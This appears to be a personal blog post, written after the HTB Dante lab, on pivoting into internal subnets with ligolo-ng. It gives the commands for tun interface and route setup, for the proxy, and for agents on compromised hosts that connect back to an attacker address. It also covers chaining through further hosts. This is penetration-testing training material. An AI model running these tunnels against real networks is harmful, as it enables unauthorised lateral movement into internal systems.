Iced Milo Code

Port Forwarding using Ligolo-ng

I did this in HTB Dante. Will write this post as generic as possible.

Assume you already have access to a machine, e.g. 10.10.110.X. You noticed that it has access to 172.16.1.0/24 network.

You want to access 172.16.1.0/24 from your local Kali 10.10.14.2

End result should look something like this:

Download the agent and proxy files from ligolo-ng Github

Transfer the agent file to the target machine, 10.10.110.X

Set up the interface and route in Kali by running these commands

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.1.0/24 dev ligolo

Now, time to establish the connection

Kali:
sudo ./proxy -selfcert

Target:
chmod +x agent
./agent -connect 10.10.14.2:11601 -ignore-cert

Can see that agent has joined. So we gonna start the session in Kali

session
1
start

On a new terminal window, you should be able to ping machines that are in 172.16.1.0/24.

Double Pivoting

Assumptions: Your Kali is able to reach 172.16.1.0/24 network using ligolo-ng from the previous step. Now, you want it to reach 172.16.2.0/24 as well. The machine that has connectivity to 172.16.2.0/24 is 172.16.1.A

End result should look like this image:

On Kali, add another route

sudo ip route add 172.16.2.0/24 dev ligolo

On 172.16.1.A, transfer agent file to it. It will be agent.exe if it is a Windows machine.

Run the same command as what you did before

agent.exe -connect 10.10.14.2:11601 -ignore-cert

On your original ligolo-ng proxy screen, you can see new agent joined. You can switch to this new agent

session
2
start
Yes

Now, try ping should be able to work for IPs in either subnets.

However, you will only be able to reach one machine e.g. 172.16.2.B because you are pivoting from 172.16.1.A. If you want to reach other machines in 172.16.2.0/24, you got to pivot from 172.16.2.B

On 172.16.2.B which you currently have access to, transfer agent file to it. Run the same command again.

./agent.exe -connect 10.10.14.2:11601 -ignore-cert

On the proxy window, switch session by running the same commands

session
3
start
Yes

Now, you are able to access machines in both subnets.

Cheers!

Posted by:

icedmilo

Leave a comment

About Me

Continuous learning and improvement!

Recent Posts

SEARCH